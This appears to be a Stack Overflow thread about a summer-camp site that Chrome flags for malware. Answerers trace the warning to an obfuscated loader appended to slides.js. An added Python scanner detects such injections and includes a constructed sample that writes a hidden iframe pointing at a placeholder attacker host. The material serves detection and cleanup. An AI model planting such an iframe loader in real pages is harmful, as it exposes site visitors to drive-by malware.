views: 147, answers: 3

I'm completing the development of a site I didn't build (I designed it, but another has built it so far) and recently when I visit the site in Chrome I get a "Malware Detected!" Warning box.

The site is http://kenbrook.org/ It's for a summer camp, and it's a basic brochure type site with your average marketing content. It was built on the ModX content management framework, and uses a few plugins.

I have no clue how or what this is from, or how to deal with it. In troubleshooting another issue with this site (CSS related) a user in another stackoverflow question mentioned an insight about that malware problem: http://stackoverflow.com/questions/3325478/when-using-the-firefox-webdeveloper-toolbar-to-edit-css-why-do-some-image-disapp/3373080#3373080

I'm not even sure what that script is on the site for?! Can anyone give me any insight about this issue and how I should begin to resolve it? I'm responsible for it now, so "Go back to the original developer and get him to work it out" is not an option.

In case you'd rather not visit the site, here's the warning text that Chrome is giving me:

Warning: Visiting this site may harm your computer! The website at kenbrook.org contains elements from the site www.spiritek.co.jp, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer. For detailed information about the problems with these elements, visit the Google Safe Browsing diagnostic page for www.spiritek.co.jp. Learn more about how to protect yourself from harmful software online. I understand that visiting this site may harm my computer.

A: 

Well you're obviously linking something from that Japanese site (image, flash, ad iframe, applet), and that Japanese site is the one that is tagged for malware, not your site. Just remove the link to whatever it is and you'll be fine.

Tor Valamo
Trouble is I don't know what on earth would be linking to that site. Nothing I've intentionally linked to.
JAG2007
A: 

The only javascript I see loading is some google stuff. There's no reference to spiritek.co.jp. One guess is that

_gaq.push(['_setAccount', 'UA-4573442-6']);
_gaq.push(['_trackPageview']);

is an account number for www.spiritek.co.jp.

If you take out the javascript, does your problem go away?

NinjaCat
That all refers to my Google Analytics account.
JAG2007
+4  A: 

I'm not really sure what the script at the very bottom of /assets/js/slides.js is doing, but I'd try taking the last 5 lines out and see if the cross fade thing still works. I seriously doubt that the "Browser Slide-Show script" has the need to obfuscate the JavaScript at the bottom. Someone wrote to this file.

If you have software that's able to write to slides.js, you have bigger problems. Get the security on the web server tightened up (apply latest updates, patches, check permissions, change passwords, etc).

Andy Gaskell
this is it... that code at the bottom is an obfuscator that links to www.spiritek.co.jp. Look at this fiddle: http://jsfiddle.net/xa4ku/1/
Mike Sherov
Yup - that worked. Dunno how it got there though....
JAG2007
Not knowing how it got there should scare you hopefully! Follow the second half of my answer to help protect yourself from it happening again. Google also has a process for removing the warning: http://www.google.com/support/webmasters/bin/answer.py?answer=163633
Andy Gaskell
@Jag2007 If that got there without your knowing, chances are you have a vulnerability in your website that someone is exploiting. It could be a few things but most likely it's a [SQL Injection Vulnerability](http://en.wikipedia.org/wiki/SQL_injection) or unvalidated form input that displays data on the front-end.
Nathan Taylor
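The accepted answer boils down to two checks a site owner can automate: notice when a static asset such as slides.js changes behind your back, and look at a changed file for the hallmarks of an injected loader tail (unescape/eval, document.write of a hidden iframe, a host you never linked to). The script below is an added example, not code from this thread or from the kenbrook.org site. The "clean" slideshow snippet and the injected tail are constructed stand-ins, the host attacker-host.example is a placeholder, and the baseline hashes are computed in-script rather than read from a stored manifest as they would be in practice.

```python
"""Added example (not from the question or answers): flag JavaScript assets
that have changed since a known-good baseline and that contain indicators of
an appended obfuscated loader, the way slides.js was in this thread."""
import hashlib
import re
from urllib.parse import unquote

# Indicators common in injected loader tails and rare in a hand-written
# slideshow script. A hit is a reason to inspect, not proof of compromise.
SUSPICIOUS_PATTERNS = {
    "eval_call": re.compile(r"\beval\s*\("),
    "unescape_call": re.compile(r"\bunescape\s*\("),
    "fromCharCode": re.compile(r"String\.fromCharCode"),
    "document_write": re.compile(r"document\.write\s*\("),
    "hidden_iframe": re.compile(
        r"<iframe[^>]*(visibility\s*:\s*hidden|width\s*=\s*['\"]?0)", re.I),
    "long_escaped_string": re.compile(
        r"(?:\\x[0-9a-fA-F]{2}|%[0-9a-fA-F]{2}){20,}"),
}


def decode_one_layer(js_source):
    """Undo one layer of the cheap obfuscation seen in loader tails:
    \\xHH escapes and %HH URL-encoding. Enough to expose hosts and tags
    hidden inside an unescape('...') argument."""
    decoded = re.sub(r"\\x([0-9a-fA-F]{2})",
                     lambda m: chr(int(m.group(1), 16)), js_source)
    return unquote(decoded)


def external_hosts(js_source, allowed_hosts):
    """Hostnames referenced by absolute URL that are not on the allowlist."""
    hosts = set(re.findall(r"https?://([a-z0-9.-]+\.[a-z]{2,})", js_source, re.I))
    return sorted(h.lower() for h in hosts if h.lower() not in allowed_hosts)


def scan_js(js_source, allowed_hosts=frozenset()):
    """Return the indicator names found in js_source (raw and decoded)."""
    decoded = decode_one_layer(js_source)
    hits = [name for name, pat in SUSPICIOUS_PATTERNS.items()
            if pat.search(js_source) or pat.search(decoded)]
    for host in external_hosts(decoded, allowed_hosts):
        hits.append("external_host:" + host)
    return hits


def sha256_hex(data):
    """Hex SHA-256 of a file's bytes, used as the baseline fingerprint."""
    return hashlib.sha256(data).hexdigest()


def changed_files(baseline, current):
    """Compare {path: sha256} dicts; return paths that are new or changed."""
    return sorted(p for p, h in current.items() if baseline.get(p) != h)


# Constructed sample: a stand-in for the legitimate slideshow script.
CLEAN_SLIDES_JS = """// Browser Slide-Show script (constructed stand-in)
var slides = document.querySelectorAll('.slide');
var current = 0;
function crossFade() {
  slides[current].style.opacity = 0;
  current = (current + 1) % slides.length;
  slides[current].style.opacity = 1;
}
setInterval(crossFade, 4000);
"""

# Constructed sample: the same file with an appended loader tail that writes
# a zero-size iframe pointing at a placeholder host.
INJECTED_SLIDES_JS = CLEAN_SLIDES_JS + (
    "\ndocument.write(unescape('%3Ciframe%20src%3D%22http%3A%2F%2F"
    "attacker-host.example%2F%22%20width%3D0%20height%3D0%3E%3C%2Fiframe%3E'));\n"
)

# Baseline would normally be stored when the site was last known good.
BASELINE = {"assets/js/slides.js": sha256_hex(CLEAN_SLIDES_JS.encode())}
CURRENT = {"assets/js/slides.js": sha256_hex(INJECTED_SLIDES_JS.encode())}


def report():
    """Changed files paired with the indicators found in their contents."""
    sources = {"assets/js/slides.js": INJECTED_SLIDES_JS}
    return {path: scan_js(sources[path]) for path in changed_files(BASELINE, CURRENT)}


if __name__ == "__main__":
    for path, hits in report().items():
        print(path, "changed; indicators:", ", ".join(hits) or "none")
```

Run the baseline step against a clean checkout or a backup, store the hashes outside the web root, and rerun the comparison on a schedule; a changed file with no indicators is still worth a look, since only the hash comparison catches an injected tail that uses tricks this pattern list does not know about.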